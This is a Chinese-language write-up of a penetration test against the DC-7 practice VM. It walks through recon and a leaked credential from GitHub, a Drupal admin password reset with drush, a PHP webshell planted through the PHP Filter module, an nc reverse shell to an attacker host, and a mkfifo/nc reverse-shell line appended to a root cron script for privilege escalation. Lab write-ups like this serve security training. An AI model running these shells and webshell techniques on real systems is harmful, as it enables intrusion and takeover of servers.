DC-7靶机渗透测试

2023-11-13

DC-7靶机渗透测试

1. 信息收集

1.1 主机扫描

netdiscover -r 192.168.188.157 -i eth0

image-20230812141925433

1.2 端口扫描

nmap -sS -sV -A -p- 192.168.188.177

image-20230812142215971

发现DC-7开放了22端口和80端口。

Web页面访问

image-20230812142317460

Wappalyzer扫描

image-20230812142659582

Drupal:Drupal是使用PHP编写的流行的开源内容管理系统。

1.3 目录扫描

dirsearch -u 192.168.188.177 -e * -i 200

image-20230812143422212

发现登录页面/user/login,进入到该页面查看。

image-20230812143547269

在尝试发现这里无法使用暴力破解或者字典攻击等。

DC-7作者给出的提示

image-20230812142523994

在左下角发现了一个 @DC7USER 使用浏览器查看,发现是一个 GitHub项目。进到Dc7User的github里面,在一个**config.php**文件里出现用户名和密码信息。

image-20230812144252367

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

2. SSH远程登录

使用获取到了用户名密码进行ssh远程登录。

ssh dc7user@192.168.188.177

image-20230812144456832

登录成功,查看都有哪些文件。

image-20230812144728238

发现了两个文件**backupsmobx文件夹,查看backups**文件。

image-20230812144839636

发现了两个后缀名为**.gpg**的文件,百度搜索一下该后缀。

.gpg 后缀的文件通常是使用 GNU Privacy Guard (GPG) 或类似的加密软件创建的加密文件。GPG 是一个开源的加密工具,用于确保数据的机密性和完整性。

.gpg 文件是经过加密的文件,其中包含了原始文件的内容,但使用了加密算法对其进行了保护。这些文件经过加密后,只能通过相应的私钥或密码进行解密,以还原到原始文件。

使用 GPG 可以为文件、文本消息、电子邮件等创建加密和解密操作。通过使用公钥加密算法和对称密钥加密算法,GPG 可以将数据加密并保护其安全性,同时确保只有拥有相应私钥或密码的人才能解密和访问数据。

需要注意的是,.gpg 文件本身并不能直接打开或查看其内容,因为它们经过加密保护。要解密 .gpg 文件并访问其中的内容,需要使用相应的加密软件(如 GPG)和正确的私钥或密码来进行解密操作。

查看mbox文件,发现在/opt/scripts/ 有个可以执行的脚本文件 backups.sh

image-20230812145523144

进入到/opt/scripts目录下进行查看

cd /opt/scripts/ 	 # 进入目录

cat backups.sh		 # 查看文件

image-20230812145716691

提示说切换到/vat/www/html下,执行drush命令。

image-20230813152938566

Drush(全称:Drupal Shell)是一个用于管理和维护 Drupal 内容管理系统的命令行工具。它提供了一组用于执行常见 Drupal 管理任务的命令,并允许开发人员在命令行界面上快速自动化执行这些任务。用于管理和操作drupal站点,可以用来修改管理员密码。

查看drush的命令

image-20230812191944496

进入到指定目录下执行drush命令。

drush user-password admin --password="123456"  # 修改密码

drush user-password admin --password="123456" 是一个使用 Drush 命令行工具的命令,用于修改 Drupal 站点中管理员账户(admin)的密码。

具体解析该命令如下:

  1. drush:这是执行 Drush 命令的关键字。
  2. user-password:这是 Drush 命令的子命令,用于修改用户密码。
  3. admin:这是要修改密码的目标用户,这里是指管理员账户。
  4. --password="123456":这是一个选项,用于指定新密码。在等号后面指定新密码,这里的新密码是 “123456”。

image-20230812151401324

返回返回到web页面进行登录

image-20230812151515633

登录成功!

3. 漏洞发现

浏览页面中在Manage下的Content,然后点击Add content

image-20230812151843451

点击Article

image-20230812152057500

尝试添加php一句话木马,发现Drupal 8版本以后为了安全需要将php单独作为一个模块导入。需要去扩展里下载安装

image-20230812152535544

安装扩展,以URL的形式安装php8

image-20230812153139774

在输入框输入下载路径

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

image-20230812153315518

安装成功, 选第二个即可。

image-20230812153530875

在Extend里的List里,往下滑动,找PHP有关的,勾选上PHP Filter往下滑点击install。

安装完成

image-20230812153832248

4. 漏洞利用

然后来到Content进行编辑,添加php木马代码,保存text format设置为PHP code最后点击save保存即可。

image-20230812154240970

image-20230812154629647

首页显示创建成功

image-20230812154717958

查看刚刚上传的一句话木马所在的位置

image-20230812155029202

http://192.168.188.177/node/4

使用中国蚁剑进行连接

image-20230812155110613

kali开启监听4444端口

nc -lvp 4444 

image-20230812155259332

通过蚁剑的虚拟终端进行反弹shell

nc -e /bin/bash 192.168.188.157 4444

image-20230812155533358

反弹成功后设置python交互

python -c 'import pty;pty.spawn("/bin/bash")'

image-20230812155559539

查看权限,发现当前权限比较低,进行提权。

5. 提权

在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell。

image-20230812160701061

kali监听9999端口

image-20230812161710850

要对之前的 backups.sh 脚本写入反弹命令。

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.188.157 9999 >/tmp/f" >> backups.sh

这个命令会将一条具有恶意的 Shell 脚本追加到 backups.sh 文件中。

下面对该命令进行详细解析:

  1. echo "...":这是用于输出文本的命令。在双引号内部的内容将被输出。
  2. "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.188.157 9999 >/tmp/f":这是要输出的具体内容,即恶意的 Shell 脚本。
    • rm /tmp/f:删除名为 /tmp/f 的文件,如果该文件存在的话。
    • mkfifo /tmp/f:创建一个命名管道(FIFO),名为 /tmp/f
      • 命名管道(FIFO)是一种特殊类型的文件,用于实现进程间通信。它是一种单向通信机制,允许一个进程写入数据到管道,而另一个进程则可以从同一个管道读取相应数据。
      • 命名管道在创建时会在文件系统中产生一个文件节点,当进程打开该文件并进行读取/写入操作时,其行为类似于对普通文件的操作。但不同于普通文件,命名管道没有实际的文件内容,它只是作为进程之间的通信通道。
    • cat /tmp/f | /bin/sh -i 2>&1:将 /tmp/f 的内容通过管道传递给 /bin/sh这会执行一个交互式的 Shell
    • nc 192.168.188.157 9999 >/tmp/f:将 /bin/sh 的输入和输出通过网络连接到 IP 地址为 192.168.188.157、端口为 9999 的远程主机,并将输出重定向到 /tmp/f 文件中。
  3. >> backups.sh:将前面输出的内容追加到名为 backups.sh 的文件末尾。若该文件不存在,则会创建一个新文件。

查看命令是否写入

image-20230812162621630

写入命令后在这里等待的时间较长,因为这个脚本是一个定时执行的脚本。

然后就进到root家目录获取最终flag。

image-20230812163045819

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

DC-7靶机渗透测试 的相关文章

  • 盘点那些年我们一起玩过的网络安全工具

    大家好 我是IT共享者 这篇文章给大家盘点那些年 我们一起玩过的网络安全工具 一 反恶意代码软件 1 Malwarebytes 这是一个检测和删除恶意的软件 包括蠕虫 后门 流氓 拨号器 间谍软件等等 快如闪电的扫描速度 具有隔离功能 并让
  • 适用于任何公司的网络安全架构

    1 第一等级 基础级 优势 可防范基本有针对性的攻击 使攻击者难以在网络上推进 将生产环境与企业环境进行基本隔离 劣势 默认的企业网络应被视为潜在受损 普通员工的工作站以及管理员的工作站可能受到潜在威胁 因为它们在生产网络中具有基本和管理员
  • SpiderFlow爬虫平台 前台RCE漏洞复现(CVE-2024-0195)

    0x01 产品简介 SpiderFlow是新一代爬虫平台 以图形化方式定义爬虫流程 以流程图的方式定义爬虫 不写代码即可完成爬虫 是一个高度灵活可配置的爬虫平台 0x02 漏洞概述 SpiderFlow爬虫平台src main java o
  • 掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了

    文末送书 文末送书 今天推荐一本网络安全领域优质书籍 内网渗透实战攻略 文章目录 前言 如何阅读本书 目录 文末送书 前言 当今 网络系统面临着越来越严峻的安全挑战 在众多的安全挑战中 一种有组织 有特定目标 长时间持续的新型网络攻击日益猖
  • 基于成本和服务质量考虑的不确定性下,电动汽车充电网络基础设施需求预测和迭代优化的分层框架研究(Python代码实现)

    欢迎来到本博客 博主优势 博客内容尽量做到思维缜密 逻辑清晰 为了方便读者 座右铭 行百里者 半于九十 本文目录如下 目录 1 概述 2 运行结果 3 参考文献 4 Python代码 数据
  • 【CTF必看】从零开始的CTF学习路线(超详细),让你从小白进阶成大神!

    最近很多朋友在后台私信我 问应该怎么入门CTF 个人认为入门CTF之前大家应该先了解到底 什么是CTF 而你 学CTF的目的又到底是什么 其次便是最好具备相应的编程能力 若是完全不具备这些能力极有可能直接被劝退 毕竟比赛的时候动不动写个脚本
  • WEB前端常见受攻击方式及解决办法总结

    一个网址建立后 如果不注意安全问题 就很容易被人攻击 下面讨论一下集中漏洞情况和放置攻击的方法 一 SQL注入 所谓的SQL注入 就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串 最终达到欺骗服务器执行恶意的SQL命
  • 用户数据中的幸存者偏差

    幸存者偏差 Survivorship bias 是一种常见的逻辑谬误 意思是没有考虑到筛选的过程 忽略了被筛选掉的关键信息 只看到经过筛选后而产生的结果 先讲个故事 二战时 无奈德国空防强大 盟军战机损毁严重 于是军方便找来科学家统计飞机受
  • 基于java的物业管理系统设计与实现

    基于java的物业管理系统设计与实现 I 引言 A 研究背景和动机 物业管理系统是指对物业进行管理和服务的系统 该系统需要具备对物业信息 人员信息 财务信息等进行管理的能力 基于Java的物业管理系统设计与实现的研究背景和动机主要体现在以下
  • 基于java的物业管理系统设计与实现

    基于java的物业管理系统设计与实现 I 引言 A 研究背景和动机 物业管理系统是指对物业进行管理和服务的系统 该系统需要具备对物业信息 人员信息 财务信息等进行管理的能力 基于Java的物业管理系统设计与实现的研究背景和动机主要体现在以下
  • 网络安全(黑客)自学

    1 网络安全是什么 网络安全可以基于攻击和防御视角来分类 我们经常听到的 红队 渗透测试 等就是研究攻击技术 而 蓝队 安全运营 安全运维 则研究防御技术 2 网络安全市场 一 是市场需求量高 二 则是发展相对成熟入门比较容易 3 所需要的
  • 揭秘网络世界的幕后密码——Wireshark网络协议分析软件

    在我们日常生活中 计算机和互联网已经成为不可或缺的一部分 然而 很少有人真正了解网络背后复杂的工作原理和通信协议 幸运的是 有一款强大而实用的软件 Wireshark 可以帮助我们深入了解网络世界的幕后密码 Wireshark是一款免费的网
  • 网络安全:绕过 MSF 的一次渗透测试

    这次渗透的主站是 一个 Discuz 3 4 的搭建 违法招 piao 网站 配置有宝塔 WAF 用 Discuz ML 3 X 的漏洞进行攻击 但是没有成功 发现主站外链会有一个发卡网 引导人们来这充值 是 某某发卡网 而且域名指向也是主
  • 数据加密保障数据安全

    一 目标 1 1 预研需求 数据加密是安全领域中常用的安全措施 它们的主要作用是保护数据的机密性和完整性 以防止未经授权的访问 窃取 篡改或泄漏敏感信息 数据传输加密 保护敏感数据在传输过程中的安全 当数据通过网络传输时 它们可能会经过多个
  • 国外拨号VPS指南:开启你的全球网络之旅

    在当今数字化时代 互联网已经成为了我们生活的一部分 而要在全球范围内畅通无阻地访问互联网 拥有一个可靠的国外拨号VPS是非常重要的 无论您是为了工作 学习还是娱乐 国外拨号VPS都可以为您提供更广泛的网络体验 本文将为您提供国外拨号VPS的
  • 内网安全:隧道技术详解

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一 CS反向连接上线 拿下Win2008 一 使用转发代理上线创建监听器 二 上传后门执行上线 隧道技术 SMB协议 SMB协议介绍
  • 为什么我强烈推荐大学生打CTF!

    前言 写这个文章是因为我很多粉丝都是学生 经常有人问 感觉大一第一个学期忙忙碌碌的过去了 啥都会一点 但是自己很难系统的学习到整个知识体系 很迷茫 想知道要如何高效学习 这篇文章我主要就围绕两点 减少那些罗里吧嗦的废话 直接上干货 CTF如
  • 【安全】原型链污染 - Hackit2018

    目录 准备工作 解题 代码审计 Payload 准备工作 将这道题所需依赖模块都安装好后 运行一下 然后可以试着访问一下 报错是因为里面没内容而已 不影响 准备工作就做好了 解题 代码审计 const express require exp
  • 【安全】mybatis中#{}和${}导致sql注入问题及解决办法

    0 问题 使用mybatis的时候遇到了 和 可能导致sql注入的问题 1 预先了解 1 底层通过prepareStatement对当前传入的sql进行了预编译 一个 被解析为一个参数占位符 解析之后会将String类型的数据自动加上引号
  • 【安全-SSH】SSH安全设置

    今天发现自己的公有云服务器被攻击了 在这里插入图片描述 https img blog csdnimg cn direct cafdca04646f4b8b838400ec79ac282f png 然后查看了登录日志 如上图 ls sh va

随机推荐

  • mysql数据库权限控制(权限级别 、用户管理)

    权限级别 Global level 系统级 所有库 所有表 的权限 Database level 某个数据库中的所有表 的权限 able level 库中的某个表 的权限 Column level 表中的某个字段 的权限 procs lev
  • Basic Level 1082 射击比赛 (20分)

    题目 本题目给出的射击比赛的规则非常简单 谁打的弹洞距离靶心最近 谁就是冠军 谁差得最远 谁就是菜鸟 本题给出一系列弹洞的平面坐标 x y 请你编写程序找出冠军和菜鸟 我们假设靶心在原点 0 0 输入格式 输入在第一行中给出一个正整数 N
  • ant-design中textArea组件获取光标位置,插入表情之后自动将光标移至文本的最后

    目前的需求是要设置一段文本 但是文本里可以插入微信表情 需要实现在插入表情之后光标位置自动移到当前文本的最后 效果图 实现代码 textArea组件
  • es查询列表如何去重?

    SearchSourceBuilder builder new SearchSourceBuilder builder collapse new CollapseBuilder name keyword 在Elasticsearch中 bu
  • python面试总结

    python面试题 python中is和 的区别 Python中对象包含的三个基本要素 分别是 id 身份标识 type 数据类型 和value 值 比较的是value值 is 比较的是id 简述read readline readline
  • 解决pip._vendor.urllib3.exceptions.ReadTimeoutError: HTTPSConnectionPool

    解决pip vendor urllib3 exceptions ReadTimeoutError HTTPSConnectionPool host files pythonhosted org port 443 Read timed out
  • 公众号(服务号)模板消息(个人通知)开发方案

    公众号消息通知 微信公众号开发文档 公众号是以微信用户的一个联系人形式存在的 消息会话是公众号与用户交互的基础 目前公众号内主要有这样几类消息服务的类型 分别用于不同的场景 1 群发消息 公众号可以以一定频次 订阅号为每天1次 服务号为每月
  • windows下启动mysql服务的命令行启动和手动启动方法

    今天遇到mysql服务无法启动 上网一查很多人也遇到mysql服务器启动不了的问题 所以就索性整理了windows下启动mysql服务的命令行启动和手动启动方法的文章 以便各位遇到同类问题的朋友进行参考 1 图形界面下启动mysql服务 在
  • Hugging Face开源库accelerate详解

    官网 https huggingface co docs accelerate package reference accelerator Accelerate使用步骤 初始化accelerate对象accelerator Accelera
  • java基础案例教程黑马程序员案例答案,真香

    掌握核心知识 1 90 几率面试被问 吃透原理 面试不慌 Spring原理 2 大厂必问Redis 赶紧码起来 Redis核心原理 3 MySQL从入门到实战都在这篇 面试笑谈优化 当然核心知识不止这三点 这只是一部分 吃透源码 1 面试源
  • 默认路由(详细解析)

    一 默认路由 1 全球最大的网段 子网掩码越短 子网掩码写成二进制形式后1的个数越少 主机位越多 该网段的地址数量就越大 因此如果想让一个网段包括全部的IP地址 就要求子网掩码短到极限 最短就是0 子网掩码变成了0 0 0 0 这也意味着该
  • Scrapy框架之Crawlspider的使用

    Scrapy存在多种爬虫类 最常用的有两种 第一种是基于basic模版创建的普通爬虫类Scrapy spider 另一种是基于crawl的规则性爬虫类scrapy spider crawlspider 一 crawlspider 经常用于数
  • 记一次应用破解——脱壳修改后重打包

    样本是在某个群里下载的 当时是有人发出来找人帮忙修改下 我是想练练手就下载下来开始修改 首先拿到应用先看了下是加壳了 腾讯的壳 然后安装看了下需要修改的地方 需求就是改一下qq群 开始动手 一 脱壳拿到dex文件 我这里直接使用脱壳机脱壳拿
  • 称重传感器HX711的驱动。适用于arduino、ESP32

    github链接 YukiTbst trust measurer 基于HX711的旋翼推力测量实验台 包含了HX711的驱动 Propeller trust measurer based on HX711 including a drive
  • Ubuntu下ftp服务器配置方法 (高级配置)

    Ubuntu下ftp服务器配置方法 Ubuntu自 带的FTP服务器是vsftpd 1 安装vsftpd Ubuntu安装软件倒不是件困难的事 输入 sudo apt get install vsftpd 安装了之后会在 home 下建立一
  • 《啥是佩奇》,python程序员眼中的佩琦

    啥是佩奇 从前天晚上开始 朋友圈就被这条广告刷屏 也许很多人 看完这个短片也有这样的想法 没错 佩奇是容易被忽略的亲情 明明是一个广告 都能这么吸引人 让人笑中带泪 泪中含笑的 告诉爷爷 你需要什么东西 爷爷给你准备 佩奇 什么是佩奇呀 这
  • Neo4j:入门基础(二)之导入CSV文件

    CSV文件 1 csv文件推荐是utf 8编码 否则会造成中文乱码 2 csv文件默认需要放在import目录下 如需从远程或者其他本地目录导入 则需要修改conf neo4j conf load csv时文件路径 默认需要放在 NEO4J
  • Cesium 之加载ArcGIS Server 4490切片服务(含orgin -400 400)

    对于ArcGIS Server发布的切片服务 在地理坐标系中Cesium默认只支持wgs84的4326坐标系 无法通过ArcGisMapServerImageryProvider直接加载CGCS2000的4490坐标系 虽然可以使用WebM
  • openGL之API学习(六十七)glTexParameter glTextureParameter

    设置纹理对象的参数 这两个函数其实是一个功能 void glTexParameterf GLenum target GLenum pname GLfloat param target Specifies the target to whic
  • DC-7靶机渗透测试

    文章目录 DC 7靶机渗透测试 1 信息收集 1 1 主机扫描 1 2 端口扫描 1 3 目录扫描 2 SSH远程登录 3 漏洞发现 4 漏洞利用 5 提权 DC 7靶机渗透测试 1 信息收集 1 1 主机扫描 netdiscover r